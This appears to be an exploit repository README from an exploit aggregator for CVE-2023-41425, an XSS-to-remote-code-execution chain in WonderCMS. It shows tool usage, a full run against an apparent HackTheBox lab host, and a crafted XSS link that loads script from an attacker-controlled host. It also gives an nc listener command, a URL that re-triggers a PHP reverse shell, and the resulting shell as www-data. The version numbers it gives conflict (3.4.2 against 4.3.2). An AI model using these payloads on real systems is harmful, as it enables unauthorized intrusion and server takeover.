## https://sploitus.com/exploit?id=B3D10DBC-9B30-5659-ADB7-5D419F791812
# CVE-2023-41425
## Description
A Cross Site Scripting vulnerability in Wonder CMS Version 3.2.0 to Version 3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
This is a modifed version of the original exploit by [prodigiousMind](https://github.com/prodigiousMind/) which extends to exploit to serve the entire exploit locally, with no reliance on an external internet connection.
It's useful if you're all at sea, an found a problem with your bike...
Note: xss.js left in the repo for demonstration purposes, the script will overwrite this with your configuration when run.
## Usage
```
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT
WonderCMS 4.3.2 XSS to RCE Exploit
options:
-h, --help show this help message and exit
-u URL, --url URL The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
-lh LHOST, --lhost LHOST
The IP address for the reverse shell listener
-lp LPORT, --lport LPORT
The port for the reverse shell listener
-sh SRVHOST, --srvhost SRVHOST
The local IP serving the malicious XSS JavaScript
-sp SRVPORT, --srvport SRVPORT
The local port serving the malicious XSS JavaScript
```
## Example
Note: This exploit can be quite slow to work!
```
$python3 exploit.py -u http://sea.htb/loginURL -lh 10.10.14.101 -lp 7777 -sh 10.10.14.101 -sp 8888
##################################
# Wondercms 4.3.2 XSS to RCE #
# Original POC by prodigiousMind #
# Updated version by Ducksec #
##################################
Check you got this stuff right!
Parsed arguments:
URL: http://sea.htb/loginURL
LHOST: 10.10.14.101
LPORT: 7777
SRVHOST: 10.10.14.101
SRVPORT: 8888
[+] xss.js is created
[+] Execute the below command in another terminal:
----------------------------
nc -lvp 7777
----------------------------
Send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
----------------------------
[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.
[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777
Starting HTTP server to allow access to xss.js
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
```
```
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
13:40:01 up 4 min, 0 users, load average: 0.93, 0.49, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
## References
1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3
## Disclaimer
This code is provided for educational and ethical security testing purposes only. It should be used responsibly and only in environments where explicit authorization has been granted. Unauthorized or malicious use is strictly prohibited. By using this code, you agree to adhere to all applicable laws, regulations, and ethical standards applicable in your jurisdiction. The creators and contributors disclaim any liability for any damages or consequences arising from the misuse or unauthorized use of this code.